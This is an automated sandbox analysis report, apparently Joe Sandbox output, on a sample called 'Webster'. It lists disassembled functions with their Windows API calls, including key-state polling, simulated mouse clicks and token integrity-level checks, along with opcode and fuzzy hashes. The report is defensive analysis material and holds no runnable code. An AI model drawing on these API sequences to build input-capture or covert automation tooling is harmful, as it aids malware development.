                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                                                  • Instruction ID: c9f8ed7ade3041d236902078cc357ce16913d4d56c387c8605e2b8769ee2d179
                                                                                  • Opcode Fuzzy Hash: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                                                  • Instruction Fuzzy Hash: F641D035904214AFD720DB28CC88FA9BFF8EB09310F5489A5F916A72D1CB70AD41DA91
                                                                                  Function 00A82714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00A82727
                                                                                  • ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                                                  • Instruction ID: c3b8855ecbb31b9226bc472da62046e87461ec0baf1d074ec6598700f89f1d89
                                                                                  • Opcode Fuzzy Hash: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                                                  • Instruction Fuzzy Hash: EE416C75504119FFDF15AF69C844EE9BBB8BB05334F50835AF82896291CB30ADA0DB91
                                                                                  Function 00AD95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00AD95E8
                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00AD9692
                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AD969A
                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00AD96A8
                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AD96B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3382505437-0
                                                                                  • Opcode ID: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                                                  • Instruction ID: 45a5067ec412803f47c72d88cc31fb3ee7a4ddc4e4985759950be425b86cd93f
                                                                                  • Opcode Fuzzy Hash: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                                                  • Instruction Fuzzy Hash: C931CC71900219EFDB14CF68D94CADE3BB5FB44315F10822AF926AB2D0C7B0D964DB90
                                                                                  Function 00ADBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00ADBD9D
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ADBDBA
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ADBDF2
                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ADBE18
                                                                                  • _wcsstr.LIBCMT ref: 00ADBE22
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                  • String ID:
                                                                                  • API String ID: 3902887630-0
                                                                                  • Opcode ID: beb54a4fa45e14b32201903d537f3e1a366d61897d8a3acb120177027e007897
                                                                                  • Instruction ID: 80e2bfb6f9bdfd9b73446817e5a6e1cb1e2b8a410604e1a807ab1951c0507393
                                                                                  • Opcode Fuzzy Hash: beb54a4fa45e14b32201903d537f3e1a366d61897d8a3acb120177027e007897
                                                                                  • Instruction Fuzzy Hash: 8021F932614204FFEB255B399C49EBB7BADDF45760F11802AF90ADB291EF61DC509270
                                                                                  Function 00B0B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0B804
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B0B829
                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B0B841
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00B0B86A
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AF155C,00000000), ref: 00B0B888
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2294984445-0
                                                                                  • Opcode ID: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                                                  • Instruction ID: 15d8e47e737ac5bf6d6f06e35c6651d1f90150b3a0963fe53618adcd74727aa8
                                                                                  • Opcode Fuzzy Hash: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                                                  • Instruction Fuzzy Hash: 4D219131A24215AFCB149F398C48F6A3BE9FB05724F148769F921D72E0DB708950CB80
                                                                                  Function 00AD9EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AD9ED8
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD9F0A
                                                                                  • __itow.LIBCMT ref: 00AD9F22
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD9F4A
                                                                                  • __itow.LIBCMT ref: 00AD9F5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2983881199-0
                                                                                  • Opcode ID: 8a2474fad3a58293dfa828fa4436a5acb1c07297731dd46a474e3ebeb4caadce
                                                                                  • Instruction ID: 67a355b4bf4f3c076452629f294c76066285191f753927c24aa847a42d4155b4
                                                                                  • Opcode Fuzzy Hash: 8a2474fad3a58293dfa828fa4436a5acb1c07297731dd46a474e3ebeb4caadce
                                                                                  • Instruction Fuzzy Hash: D321C831700305BBDF10AB948D89EEF7BACEB99750F144026F902D7281DA70CD4197E2
                                                                                  Function 00AF6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 00AF6159
                                                                                  • GetForegroundWindow.USER32 ref: 00AF6170
                                                                                  • GetDC.USER32(00000000), ref: 00AF61AC
                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00AF61B8
                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00AF61F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                  • String ID:
                                                                                  • API String ID: 4156661090-0
                                                                                  • Opcode ID: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                                                  • Instruction ID: 61ac99d6835c63bf98f6a379f3acdc7f6e51ae0effdf92858ed4999c46857449
                                                                                  • Opcode Fuzzy Hash: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                                                  • Instruction Fuzzy Hash: 1E21A175A00204AFD700EFA5DD84AAABBF9EF88350F04C469F94AD7352CE74AC40CB90
                                                                                  Function 00A816CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                  • BeginPath.GDI32(?), ref: 00A8174F
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                                                  • Instruction ID: 1292f7c95c73068c30605fd8bd9a5d83a39e18ae59b0bba78c38f7fbfd67c380
                                                                                  • Opcode Fuzzy Hash: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                                                  • Instruction Fuzzy Hash: 7F219034814208EBDB10EF6ADD48BA97BACF701321F14422AF855971A0DFB09A92CF90
                                                                                  Function 00ADC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                                                  • Instruction ID: d0674d4143885b1eddd32edde9c75990aa6cb869bba9b885f1077a10d6c13e7e
                                                                                  • Opcode Fuzzy Hash: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                                                  • Instruction Fuzzy Hash: B401D272A442063BD60466109E82FEF73ACDA217A4F544126FE07D7382F760DE10E2E0
                                                                                  Function 00AE504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AE5075
                                                                                  • __beginthreadex.LIBCMT ref: 00AE5093
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00AE50A8
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AE50BE
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AE50C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                  • String ID:
                                                                                  • API String ID: 3824534824-0
                                                                                  • Opcode ID: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                                                  • Instruction ID: fe4d9d52615985c58f5758798b7e7dce99213db2d33d59035ccedc8d42a6b1a1
                                                                                  • Opcode Fuzzy Hash: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                                                  • Instruction Fuzzy Hash: DC110476D08748BFC7019FB9AC04ADB7BACAB46324F54425AF814D3390DBB58A408BF0
                                                                                  Function 00AD8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                  • GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                                                  • Instruction ID: efe9a11bf997c7a3667697ca197377c1f19bf2796b40e7517968755a17df54ad
                                                                                  • Opcode Fuzzy Hash: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                                                  • Instruction Fuzzy Hash: A8016D70210204BFDB205FA6DC48DAB7BBDEF89354B50452AF949C3220DE75DC50CA60
                                                                                  Function 00AE57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE581B
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE5829
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5831
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE583B
                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                                                  • Instruction ID: 1a40e382d76f2e35e9ed51b8f0c3915b46440a96824200de4e27cfc53be3f335
                                                                                  • Opcode Fuzzy Hash: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                                                  • Instruction Fuzzy Hash: FB015731C11A1DABCF10AFFAE9489EDBBB8BB08715F408156E501F3140CF7495A0DBA1
                                                                                  Function 00AD7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?,?,00AD8073), ref: 00AD7D45
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D60
                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D6E
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?), ref: 00AD7D7E
                                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                                                  • Instruction ID: 1b6207aaaab4ff5e915aa6ad11ef896abce3eb52c69d9cb3d7f235b65b675086
                                                                                  • Opcode Fuzzy Hash: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                                                  • Instruction Fuzzy Hash: 0901BC76615219ABCB105F58DC04BAE7BBEEF44352F508025F84AD7210EBB1EE40CBA0
                                                                                  Function 00AD8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                                                  • Instruction ID: f6845c93d7972d7bdf2fc598c844a2773ae8458352662076c0a488591aafad42
                                                                                  • Opcode Fuzzy Hash: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                                                  • Instruction Fuzzy Hash: CEF0AF34210208BFEB101FA59C8CFA73BADFF49754B508026F945C7290CEA49C80DB60
                                                                                  Function 00AD8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
